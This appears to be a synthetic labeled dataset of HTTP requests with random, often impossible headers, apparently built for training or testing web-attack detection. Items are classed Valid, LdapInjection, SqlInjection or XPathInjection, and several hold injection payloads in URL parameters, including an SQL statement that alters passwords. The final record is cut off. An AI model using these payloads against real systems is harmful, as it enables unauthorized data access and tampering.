Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 41.189.98.25
Cookie: soexcziimt=unqeobaR-nie5bh?stdinr;fx38=6ntmp;oeRr9egtt=tKecXKxE
Cookie2: $Version="9"
Date: Sun, 30 May 04 18:29:32 GMT
ETag: "_tbcCy0@wz8M8jd"
Expect: hteo
From: frlm@ctsi1ez.ch
If-Modified-Since: Tue, 27 Jul 04 24:52:40 UTC
If-Unmodified-Since: Wed, 04 Nov 09 20:13:54 CET
If-Match: "x3Veeu-2SRCXR1YS"
If-None-Match: "VMlKZpg.b@p@Cc4P0hF"
If-Range: Thu, 25 Oct 07 02:09:59 CET
Max-Forwards: 6
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic dGlkaVI6ZDllUnJhcg==
Authorization: Basic c2dsb2VzOmx0c2NCNHM=
Range: -0,582766-
Referer: /ih9l/qehyo.pdf
TE: deflate;q=0.4,chunked;q=0.1,deflate
Trailer: Referer
User-Agent: Mozilla/6.7 (compatible; MSIE 0.2; Win 9x; motn9la)
UA-CPU: 68000
UA-Disp: 6597,6108,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 6897x261
Via: FTP/8.6 www.hvo5n.gif, baibtc/9.7 139.26.137.7
Transfer-Encoding: deflate
Upgrade: rysE/9.0, mt3/0.2, 84ag/2.9
Warning: 306 www.u4zhxszn.shtml "rahmw" 
X-Forwarded-For: 18.81.134.210
X-Serial-Number: 9579642646846
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38375
Start - Id: 6162
class: Valid
PUT /riiihwXIPJZNS/w7UL-wt5I1J1G/s8nB9FPrITobG0W/tV0Z5nJd-XfwnX9o0/EFsF6%unV/tCq/bpTy2IR-uN@Epy0JEO/p6neh/1rceyD6nE/U-0@LImkH/mocWomes1ejoEYrdenbo.exe? HTTP/1.1
Content-Length: 27
Content-Language: sztxn,sgXtan,4eco
Content-Encoding: identity
Content-Location: /tdlseShg/napl/remd.pdf
Content-MD5: bW5vaXM1Z3M3c0w3eW5oZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 12 Jun 06 09:27:38 GMT
Last-Modified: Fri, 22 Aug 08 15:47:29 UTC
Host: www.kTjt.ch:29
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: windows-1255, windows-1251, big5;q=0.6
Accept-Encoding: deflate;q=0.4, compress
Accept-Language: *
Cache-Control: min-fresh=253
Client-ip: 46.232.254.101
Cookie: srdoNbmena=cWzyzutK;om7=xU_P;rwh1roNodssrc=255017
Cookie2: $Version="092"
Date: Thu, 20 Jan 05 17:01:55 UTC
ETag: "nFba3eaAQeXgeEB.9Fp"
Expect: ntotfl=tARTotmv
From: naetdy@ntn7esecez.uk
If-Modified-Since: Mon, 02 Mar 09 09:43:02 UTC
If-Unmodified-Since: Tue, 25 Mar 08 03:09:01 CET
If-Match: "cpYC0mJ0xEp1ORC1b"
If-None-Match: "x4WVGBV75HqYCqKbYAOU"
If-Range: *
Max-Forwards: 26
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic MUV6bGVxOlZhZmF5c3Ji
Authorization: Basic aDJmZmc6dW5kaG1w
Range: 611533-,1458-075
Referer: http://izrd3Ty5.cz/SeLmp/uW8lse.gif
TE: chunked;q=0.9,deflate;q=0.9
Trailer: If-Unmodified-Since
User-Agent: yr1i/4.5
UA-CPU: StrongARM
UA-Disp: 105,6960,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3345x4822
Via: HTTP/4.5 38.119.127.248
Transfer-Encoding: lpPirz
Upgrade: hNeCe/7.2, uwoig/8.6
Warning: 194 www.xmkm27h.jpg "hyeTpth" 
X-Forwarded-For: 175.130.165.6
X-Serial-Number: 9298253900687
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nfgzniWnc=he&ned2o=qp&hoa=7

End - Id: 6162
Start - Id: 37726
class: LdapInjection
GET /QGMzo58/d0IkBPGdmZ5WD8M@0/d7elG/hkiMf_6C/0CMZw/upassthrur9/i.pO7gAVu/tlNnP/petEf7agssehdNenramQ/tUtlrliI8/X4RWp7dSAnuLn.gif?jechild8havingn.U=2soom%3Crartnull%3Bzicptshutdownr&o8=E31st&ro1tia0eaHeet=40526746&md9Twp=%29++%28+++%7C%28displayName%3Dhad*%29+++%28name++%3D++++had*++%29%28+mail%3Dhad*%29&sinvOsettrh6he=9st%3C%2Bi&t5ctite4oeyirtS=v+Bcmdt%289%2BmtaHm%271allo%29o&wteb=4hO&0eEuhdhsL=y3u3zf4QENY&eaatD=oaDT HTTP/1.1
Host: 246.38.61.244
Connection: yosn
Accept: */*;q=0.3
Accept-Charset: windows-1258;q=0.4
Accept-Language: *;q=0.3
Cookie: cersofamt=nxUB;Uwindow.openMy=4655;eijbohzciupeg='-8zr:Ro~t;6kpliemRnnei=ns%udsv4hk
Date: Sun, 07 Aug 05 08:52:59 CET
ETag: "Ulrvtu2pQE785CphD"
If-Match: *
If-None-Match: *
Referer: http://ro6xmyu.com/daeeiOpn/emEed/rt6g/I4Lwton.mp3
User-Agent: Mozilla/9.7 (compatible; heH91d; Solaris; tsrH6; ewtxsa; hrcsijo)
Transfer-Encoding: tgaa; qsrsyk=EFaose
Upgrade: Ap4Ev/4.4, eut/9.8
Warning: 812 www.dOsiefc.htm "lm4se" 
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37726
Start - Id: 27877
class: Valid
GET /t-OgpeXG5L0RoP.msf? HTTP/1.0
Host: 254.162.90.11
Connection: close
Accept: audio/*;q=0.0, text/*
Accept-Charset: windows-1257;q=0.9, big5, cp-932;q=0.8, utf-7;q=0.5
Accept-Encoding: gzip, compress, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 202.94.102.161
Cookie: scOnleynty3=hiaRgsulogincludenetcate&drlsreplace;7lhBn=pae7xs87rsncssDet
Cookie2: $Version="71"
Date: Fri, 29 Feb 08 21:57:57 UTC
ETag: "3bi8TVg5_pidMUIy"
Expect: ejdey=oobsrshy;ee21tw7e=gdoE
From: naOe@fsh5cXZ.uk
If-Modified-Since: Tue, 14 Jun 05 22:01:52 UTC
If-Unmodified-Since: Thu, 09 Jul 09 14:07:37 GMT
If-Match: "LRYuIKkCo4Gdmci.15"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: nd1t nsieUE6e=uDueyte
Authorization: Basic bHpucnQ6NzZlZw==
Range: 334528-3,129-5609,255074-1318
Referer: /s1urgv/edhtuu7t/oCpeTut/atie.php
TE: trailers,chunked,deflate;q=0.4
Trailer: Accept-Encoding
User-Agent: Mozilla/0.8 (Machintosh; U; Mac OS X 2.7; Ts-ti; rv:0.5.2) Gecko/81666862
UA-CPU: x86
UA-Disp: 0211,623,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8765x0161
Via: 3.3 www.e3sgoc.jpg:13, HTTP/6.5 144.104.183.146:74534, FTP/5.1 www.xiix.shtml
Transfer-Encoding: deflate
Upgrade: nen/9.1, a8m/4.8, eeIy/6.6, o06on/8.4, 6jt5s/6.6
Warning: 179 www.snrm.css "8ebbnsessuhaeisimedl" 
X-Forwarded-For: 122.11.217.222
X-Serial-Number: 8614528725280
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27877
Start - Id: 35383
class: SqlInjection
GET /eqQfhZprZw5WNh/ihrol/atmlmaltite0/ttsmerrtoflectai/GvxM/rH/WC.mspx?stneed7oo=tntqeqtu&sEtq=NL&osqwh4cnzs=tns1uarIc%7Cev&yvddnd=eebnentpslw&evlthteewnaa=wtdddHhoisf%7C&naihgei=eull&ebvdietre=dy&eoetrr=23574796&hnxUexec8=%3Balter++table+erstor+++set+++++password+%3D+%27uui4Ee%27++where++name+%3D+++%27ssegz%27%3B&DenLcodthnbnDl=93447102&hymmxtc4rhbq=Srb&mR2rAu5rd=09768&htfdoiak4=xabgsound HTTP/1.0
Host: www.lwrqh.st
Connection: atxd
Accept: */*;q=0.0
Accept-Charset: iso-8859-8, iso-8859-15, windows-1250;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 246.233.58.195
Cookie: ati5steu=xtermmnir;ploEs=08516422;eo=71
Cookie2: $Version="548"
Date: Sun, 17 Dec 06 24:41:58 CET
ETag: W/"YrySjLvL9c7uR21"
Expect: 100-continue
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Wed, 24 Feb 10 24:50:18 GMT
If-Unmodified-Since: Wed, 11 Nov 09 16:58:16 UTC
If-Match: "p8KVKMekg7-NuiLCaZ"
If-None-Match: "nZsX-_rwsF3vYgLqqpXS"
If-Range: Wed, 07 May 08 02:38:29 GMT
Max-Forwards: 58
MIME-Version: 9.2
Pragma: Qbd3hDeU=acrtaxe
Proxy-Authorization: wsul areisdr=nehaa
Authorization: NTLM aWFoanN0aXZlZWdsZXcwbFNnd2dlcnRycG90ZG1oVTJobmRuckVX
Range: 55-,0-,6611-
Referer: /tdacdHed/6hea/amnit/mmjiug0T.jsp
TE: trailers
Trailer: Transfer-Encoding
User-Agent: piasorEneS/9.2.1.3.2
UA-CPU: Sparc
UA-OS: Windows 95
UA-Pixels: 177x860
Via: 7.9 www.dkoTl.tiff, HTTP/4.7 www.7aio5.png
Transfer-Encoding: compress
Warning: 012 87.127.171.211 "neieAoyzeceydgth" 
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 6475982437005855
----: --------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 35383
Start - Id: 38828
class: LdapInjection
GET /betweenHft03imgKFmn/fuzBlk5/oe/2OeVG8-4et5oOK3w.png?tvi3lS=0394&ESk-I9T=tnsrq&Z0ZBhXF=rlntrxht9&tiPss36hiKtrap=%29++++%28+++%7C+++%28cek%3Da7*%29&snlesImw=e%2Fita&at4en4Inhme=rM5ieNo&uHria9raRtx=ikSotdibd&b9gchh5eawd0Eo=732357627 HTTP/1.0
Host: 105.26.50.250:80
Connection: keep-alive
Accept: video/*;q=0.0, application/*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: taspne-tio;q=0.7
Cache-Control: no-store
Client-ip: 147.81.36.108
Cookie: snevOhqnc0wm=itHirhsrahttpseui;3nhoc65by=hn2YgII;Umt=7439213969;irlpm8tcIcptrpr=dzo4;lfshixa=1ltd ERk 
Cookie2: $Version="4"
Date: Sun, 12 Mar 06 10:39:17 GMT
ETag: ".E54oRpEfAdmv5Espqw"
Expect: 100-continue
From: hth4s@nafohliad.be
If-Modified-Since: Sun, 05 Oct 08 05:47:20 UTC
If-Unmodified-Since: Tue, 25 Jan 05 12:33:46 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 28 Feb 04 10:57:59 CET
Max-Forwards: 3543
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: NTLM aWxhZnJzc2Nlc2ZvRWF0bWVwc3Jlb3NzaWFzZG9lNXVnbGRhcmh1aGU=
Range: 49-
Referer: /eaKij1/euuaj/rre6/taE6ei8y/atednb.aspx
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/7.3 (Windows; U; Win98 6.4; ix-h5; rv:1.0.1) Gecko/75963118
UA-CPU: MIPS
UA-Disp: 0767,501,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8161x590
Via: FTP/2.5 220.209.21.63, 4.5 www.tmt5pl.tiff:2, t9T/2.8 90.219.125.23
Transfer-Encoding: gzip
Upgrade: wnz/1.4, E79wa/9.8, 1dvs/2.3
Warning: 025 www.snltrm.tiff "tuatoroypwbr" 
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38828
Start - Id: 31037
class: Valid
GET /E1bsebmenabti/jBKDDRexecoFO3ingF/nsaetyttqtIlnsaDsano/ndGr8jxNp/eeyityim0bmetfba/onnOsyt71sE/MYt0r4Tj5onirclonged/eunXi2CQ/eiiGcus5l.asp?imtuaqIetuihj=1883079084&yagQalneap=%3AS%40lMnuca9%7Coejiestdini&nnyani6hl5rt=m9NhaK&sumsebrpvcs=88&ndyHbK=omjteestaw&oacsEDbK5meis=lnirf&ba=v++wchildnftpy&zGeo0a=knqscripti0btFne&kxGPNdhavingS=42801 HTTP/1.1
Host: 45.83.25.180:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-arabic;q=0.4, iso-8859-3;q=0.6, ks_c_5601-1987;q=0.9, x-mac-icelandic;q=0.2
Accept-Encoding: identity;q=0.6, compress, deflate;q=0.2, identity, gzip
Accept-Language: 6eAyut-a8asshkn, rgrckwcb-bsaRGaxm;q=0.2, ey-edjO, rarikhsh-ymE;q=0.1, ttptg-t
Cache-Control: no-store
Client-ip: 39.5.59.243
Cookie: sftz=5108342197;jiruhdednbs=ewp-
Cookie2: $Version="0"
Date: Tue, 01 Jun 04 09:38:10 UTC
ETag: "4Qz7i2fqLNR-BZg3Z"
Expect: 100-continue
From: dhorkpeo@necsezdc4.be
If-Modified-Since: Thu, 22 Apr 04 11:06:29 CET
If-Unmodified-Since: Thu, 05 Jul 07 06:36:20 UTC
If-Match: *
If-None-Match: "PufCyM1Fjydvdv5vChN"
If-Range: Sun, 02 Oct 05 22:49:22 GMT
Max-Forwards: 55
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM bnQwbXNoNkluMGVsc3dhdmFpZXNucmh5dG9rbGdsYXNodHVv
Authorization: Digest username="eshrre"
Range: -14
Referer: /leabff/sFieoh/7vlPdeq.nsf
TE: deflate,trailers
Trailer: Accept-Encoding
User-Agent: Dedcuoei/2.2.5
UA-CPU: MIPS
UA-Disp: 690,606,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 0898x5454
Via: HTTP/2.7 234.87.231.116:043, 9.7 www.pec9Fodn.png
Transfer-Encoding: gzip
Upgrade: oUeu/6.8, irr/0.1, up39/8.9, 6Two/6.9
Warning: 549 88.129.127.197 "ioEqr1" "Fri, 12 Dec 08 18:53:48 GMT"
X-Forwarded-For: 212.22.173.189
X-Serial-Number: 827318624572609
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31037
Start - Id: 25945
class: Valid
GET /hSIjARinclude/dnPmwfMs/iH/4b-o8o1cDH/hkVk7C3.CXQaoD9r9x3.asp?1TfcpUaeuvtj=5&tiaoeeNavyvr=uioPticecEg&5uhnrotm9aa8t=eshlr2&l0Mcat4ti_33=6fh&BSq2Uscriptstylez9u2V=dslpassthruItluN%2FNq9iinput&sea4Oialyrt=00727&0Nn0rte=t+ HTTP/1.0
Host: 181.178.245.246
Connection: close
Accept: application/*, audio/*;q=0.2, image/gif;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-stale
Client-ip: 168.216.246.22
Cookie: nroOaqcohgngtb2=289464
Cookie2: $Version="392"
Date: Sun, 11 Feb 07 23:11:43 CET
ETag: W/"OAUdb_ftbJ4JQYe-EAz"
Expect: Wdtndni=scinqt;enib=denWs
From: naaufvp@rOayez.uk
If-Modified-Since: Sat, 03 Apr 10 21:28:50 CET
If-Unmodified-Since: Fri, 24 Jun 05 19:13:38 CET
If-Match: *
If-None-Match: "V7k.Gy1OoiyVrdIy_1CI"
If-Range: "gqMjYTdkD-H0BCc7Y_"
Max-Forwards: 82
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: hsj6ug Ee6me=lshaee6
Authorization: Basic ZW1hbmlxOmluaWlydg==
Range: -43,-7
Referer: /Ra0S/s4h6d/iYCDead.html
TE: gzip;q=0.4,deflate
Trailer: Host
User-Agent: Mozilla/5.1 (compatible; Konqueror/6.0; Open BSD i586; amrtIe5rek; eoa4ise)
UA-CPU: StrongARM
UA-Disp: 973,4090,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 5187x1770
Via: HTTP/9.9 www.ortnbha6.tiff, FTP/3.4 www.ux1ga.png, 4.9 www.alxn9.tiff
Transfer-Encoding: identity
Upgrade: ci5/2.9, wetema/8.5, v8el3/8.4, izrs/8.5
Warning: 432 www.i3ei.js "ertmdUhs2iS" 
X-Forwarded-For: 77.185.209.175
X-Serial-Number: 1807971586692
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 25945
Start - Id: 13951
class: Valid
GET /eRU8esroe2ty823sh/eAhXc6@-hRqSNWVqYx/D5klocationQ3/acceptCjErI7echozG-3/gFhe/y3ecn2/bS2arnuTsinecostuatd.php? HTTP/1.0
Host: 182.22.213.217:171
Connection: sr9iiz
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.6, gzip, compress;q=0.6, compress
Accept-Language: a5krowtl-h5el, gtohf-eAmei3l;q=0.3, r-os;q=0.2, 3dgmdia-sdiee;q=0.7
Cache-Control: min-fresh=1338
Client-ip: 87.204.53.134
Cookie: ypaT=542305;rTdpgrsthdtd=m;oefnhdoohalr=5iaahpxatt4
Cookie2: $Version="035"
Date: Wed, 20 Sep 06 22:43:34 CET
ETag: "W6cOlf_yqJ64Fb."
Expect: efbid
From: oalearnr@ntEfqd.fr
If-Modified-Since: Wed, 06 Oct 04 13:58:31 GMT
If-Unmodified-Since: Mon, 22 Dec 08 04:42:18 UTC
If-Match: *
If-None-Match: "NXBXydkC-CC3H_MT8Dzw"
If-Range: Thu, 23 Apr 09 06:56:26 CET
Max-Forwards: 02
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: snrqoV s1ss=Benjeh4e
Authorization: NTLM YWg1ZGFOZW1hN2pzZUVqb3dzaVBrd2lscnRlbm9jYXR5dDA0eWRmb2R0bA==
Range: 4-17952,40583-6085
Referer: http://www.neep.biz/eepmldsM.gif
TE: trailers
Trailer: If-Modified-Since
User-Agent: liron9taea (jUzEY1_Bq)
UA-CPU: MIPS
UA-Disp: 7939,4903,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7780x7588
Via: 4.2 www.trhsnu.html
Transfer-Encoding: deflate
Upgrade: nehtZ/1.7, Etrl/3.6, Qlo6i/7.7, jnbA/3.0
Warning: 875 102.40.224.81 "as0anpoLos" "Tue, 02 May 06 13:35:17 UTC"
X-Forwarded-For: 222.27.179.251
X-Serial-Number: 5967398849780
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13951
Start - Id: 12676
class: Valid
GET /i2iO/rac/TE46ceseoaintn/osoftadovet/yefr/eCJ-37aZbxxZd31BwSd.tiff?UZQrmFnKobjecte=67&ih=415&TTtcekrtAetyT=s2DdIE&saerout=2&uahANedrznstd=lnew&aSs=593664889&tDKtXgH@CGT=n&ntortssou=toqu%5Deus&TTcivarWT.kPE=rqoIYqu.Y&Su=ee5ehnrg&nbrs=21665928 HTTP/1.1
Host: 70.90.198.134:988
Connection: close
Accept: video/mpeg, video/*;q=0.0, text/plain;q=0.2
Accept-Charset: windows-1255;q=0.0, x-mac-hebrew;q=0.6
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 59.17.147.146
Cookie: olff=WnAitdntidid;ny0traA=mcdnmi4Oew;ovty6aNp=4983772154;oe=17
Cookie2: $Version="69"
Date: Sat, 07 Aug 04 02:13:11 GMT
ETag: "Z6bDR6ol6FudYgKgsa"
Expect: 100-continue
From: heour@oeunirs.uk
If-Modified-Since: Thu, 11 Oct 07 03:30:13 GMT
If-Unmodified-Since: Thu, 23 Feb 06 10:48:02 GMT
If-Match: "sZVmn@BeBg_CfZ0LY.4"
If-None-Match: "9jcQgVINJ33W6ePDzM.I"
If-Range: "nCEW_cj-9y.w9fU"
Max-Forwards: 5
MIME-Version: 3.8
Pragma: ntl=ijeEl
Proxy-Authorization: Digest nc=cbBF28Ce
Authorization: NTLM cWthbmF5bGVvc2dmbm5FcmFhdGVvYW5laUJ2Z3Rtcm92
Range: 123920-
Referer: http://www.telaxI.ch/tati.mp3
TE: gzip;q=0.1,trailers
Trailer: If-Match
User-Agent: oxnnh1ijnmsuebeeAr
UA-CPU: PowerPC
UA-Disp: 8687,0336,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 118x1271
Via: FTP/9.0 235.209.157.243, 2.0 www.TijiOEt1.css:0178, HTTP/0.3 40.183.29.55
Transfer-Encoding: identity
Upgrade: sto2/5.6, i35ueo/6.1, obrejt/0.3, it5/7.0, igelon/5.7
Warning: 604 0.169.62.121 "ntoiigc3nubtmi3tnc" 
X-Forwarded-For: 158.192.234.112
X-Serial-Number: 444066878
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 12676
Start - Id: 49143
class: XPathInjection
GET /eB5Iu5.8FL/zoislhhfbepnmeu/s7tjo2odP/OYio7Rmdto8i/GGincludezconnectM/tteMlD.msf?ctY=es&iv=yrobject0e%3As%25t%3Eb+g%3Aeechoto&Qou=knE3mms5benmhrr&nmnmnermodaSIh=729&osZtpet9iqbs=contoev%27+++++or+++njg%2FgiWrrt%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D92%5D++or++++%27scetxViw%27++%3D++%27&etnbs8ehraTlnih=updatetb+t2hidy%3C HTTP/1.1
Host: www.aay4r1oi.com
Connection: keep-alive
Accept: image/png;q=0.2, image/*
Accept-Charset: iso-8859-15
Accept-Encoding: identity, deflate;q=0.5, identity, compress, identity
Accept-Language: *;q=0.5
Cache-Control: min-fresh=992
Client-ip: 97.222.173.73
Cookie: esedaRrGsrLeT=leee7|hrrc;40i=n;mltyFusraiscript9i
Cookie2: $Version="36"
Date: Sat, 18 Aug 07 21:11:15 GMT
ETag: "GgpzpScDa_69HXc"
Expect: odcsee
From: hstr@4dfys6.de
If-Modified-Since: Mon, 05 Oct 09 18:38:01 GMT
If-Unmodified-Since: Sun, 04 Sep 05 07:43:40 GMT
If-Match: "1NJ1GOIPBSxqN-Ou"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 5.4
Pragma: feeOe='azeuicJ'
Proxy-Authorization: NTLM aXBhOWVraXQxZXJkckVhZXgwVE5hQXhwc3RzbHJ0b2VsZnN0b25jZWFv
Authorization: Digest cnonce="eoetai"
Range: 4916-
Referer: http://aadlj.be/tbt7/Tati/hgax/cs7ozi.mpg
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/4.8 (compatible; bv5ehGT5; SunOS sun4u; E56sOorn; smhiayt)
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 793x723
Via: HTTP/5.7 142.148.78.140, HTTP/1.6 102.145.252.247
Transfer-Encoding: sois
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 384 www.rticla.shtml:33631 "lrerokniaeoes" "Wed, 18 Jan 06 05:57:49 CET"
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49143
Start - Id: 38436
class: LdapInjection
GET /w6xometa1AhbVQv4v/uhtsn/eintmoe1memOeiao/nytideaeast/iQF.jsp?hesdsei1E=hxmhltroS&wulottnTr=+wp-s&em=eoeNE3H&tbidjhvmes32o=srconnectte%3DqojpaEoA+t+u7&UTAVkxQvn_tE=d-WM04WQ&iB=-&r5VCz=96927&eorredthbo=39glssnvil&yaIggEh9mknett=TE6fwuao&1rKp8LPVvA=s&aircirrns=ex3faXGA&ysrNtdttte=Im9diel&OtehDnae3b7sbln=2719%29%28%26%28objectClass%3Dm9lr%29%28%7C%28sn++%3D+++ibsi%29%28cn%3Dai+++++J*%29%29 HTTP/1.1
Host: www.eneetRisnt.biz:80
Connection: XHyunni
Accept: text/*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.8, deflate, gzip;q=0.1, deflate
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 91.250.232.64
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="91"
Date: Mon, 06 Mar 06 14:00:44 UTC
ETag: W/"nP544NpAMRY.6MYR"
Expect: 100-continue
From: it2uy@ylrV.fr
If-Modified-Since: Sat, 11 Aug 07 02:04:04 UTC
If-Unmodified-Since: Thu, 10 Jul 08 13:09:39 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 141
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM YXVueWV1dG5kc01uZWVzb3JlaUhrRm5hdGFld2hoc3Ryb250bm44
Authorization: Digest username="aSaCs"
Range: -03,38-
Referer: /bR5tta/higr/ehjo5ht/Esfir.mpg
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/9.9 (Windows; U; Win 9x 3.4; 0a-iu; rv:6.9.1) Gecko/30430330
UA-CPU: 68000
UA-Disp: 6654,995,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 040x944
Via: 1.7 236.203.106.128:54, eetr/8.2 www.eosiioJ.gif, dbs6/8.0 www.0ensp.png:33536
Transfer-Encoding: identity
Upgrade: lig/4.2, roeri/4.4
Warning: 968 137.187.216.156 "d0uqrloAeea9aicnUoc" "Mon, 22 Mar 10 04:21:49 GMT"
X-Forwarded-For: 180.11.72.245
X-Serial-Number: 8565701730547644653
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38436
Start - Id: 11190
class: Valid
GET /zb1ristysmrmo/on4a/Bh-b/B5GdXx_xml7eWgEW7/ttddelotmannlil/uowuiAev/1T4zxi4Qliball/tSncfly1eccskti.png?anhoid=155813863&mpeDs=81149&dhhehy0tyiw=7eeoavnltfTaosgT%3Brn&lNyodjrugn=nlwheii%28 HTTP/1.1
Host: www.eYNhw6.org:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, compress;q=0.3, identity
Accept-Language: E-yyt0s, s-aaIEsa;q=0.1, eerWoqd-a7taj;q=0.2
Cache-Control: only-if-cached
Client-ip: 22.90.22.5
Cookie: uyloJGheoe=tOdneenttt;ZJuallG7=el2Ri 9'la?iohn
Cookie2: $Version="56"
Date: Sun, 10 Jan 10 22:16:07 CET
ETag: "pa3UkJusathI0wj9l"
Expect: eczeesu=iUmhal;nbcu
From: oner40@a3mRaitss.com
If-Modified-Since: Sat, 01 Apr 06 01:57:54 UTC
If-Unmodified-Since: Wed, 21 Mar 07 19:09:20 CET
If-Match: *
If-None-Match: "AhOn-XxNDvD00GS"
If-Range: Tue, 20 Jan 04 17:19:26 CET
Max-Forwards: 65
MIME-Version: 3.9
Pragma: g='1ottchra'
Proxy-Authorization: Digest cnonce="irua"
Authorization: NTLM c3Jvbm9sZ3NkaWRhZGxldm5ydThhbmhpRGF5bWdza21tTGR5Y3JUZGRhMEZodA==
Range: 13-23
Referer: /tsomret/SrCiod3/ltlorb8r/dns3.fgf
TE: chunked;q=0.2
Trailer: Warning
User-Agent: Mozilla/1.9 (Windows; U; Win 9x 9.7; og-oi; rv:9.4.5) Gecko/41226804
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1597x0250
Via: FTP/4.2 248.243.144.48, 9.6 www.s2iqvct.html:360
Transfer-Encoding: gzip
Upgrade: aev/1.5, 3me/3.4, 5bni/1.4, int/8.3
Warning: 346 www.sfYor.jpg "sc7si" 
X-Forwarded-For: 133.197.157.12
X-Serial-Number: 450563801661696804
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11190
Start - Id: 12164
class: Valid
GET /3t/@O2vevalYZ_ypassthruJ6xp_b/ye1gtqonkpkttyl/b308ykx6Ljws.312-D/orHraiad/ir/roEeh/hng4dtRlc/geewb3/si@QAgP.php3? HTTP/1.1
Host: 214.183.200.32:80
Connection: 7iettree
Accept: text/plain
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 21.246.158.137
Cookie: paeelyt=eu$8c1ritmpo0dit;ntaiNlt=3242354
Cookie2: $Version="8"
Date: Wed, 22 Feb 06 02:03:47 CET
ETag: "vP5WyXiK_Ogb6z9m@"
Expect: 100-continue
From: igfh@oshdsiel.net
If-Modified-Since: Mon, 06 Dec 04 18:50:49 UTC
If-Unmodified-Since: Mon, 22 Nov 04 07:18:05 CET
If-Match: "t5dlC4wLmdfAdkwC"
If-None-Match: "52_OBvkwYFZ8o6SNj"
If-Range: Fri, 24 Nov 06 06:35:24 UTC
Max-Forwards: 5
MIME-Version: 1.4
Pragma: hhniAti=qoseS
Proxy-Authorization: lert mmeei=fdhn
Authorization: NTLM bWVsZmVkY284cm9kdDZ3Y3ZpYnJuRHR0TmZpYVFnaXN0YnI=
Range: 807559-8320
Referer: http://www.lu5rwe.gov/wihttc.png
TE: gzip;q=0.5,trailers
Trailer: Host
User-Agent: Mozilla/7.9 (Windows; U; Windows NT 5.5; mo-ag; rv:7.1.9) Gecko/92143718
UA-CPU: 68000
UA-Disp: 908,936,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 5894x857
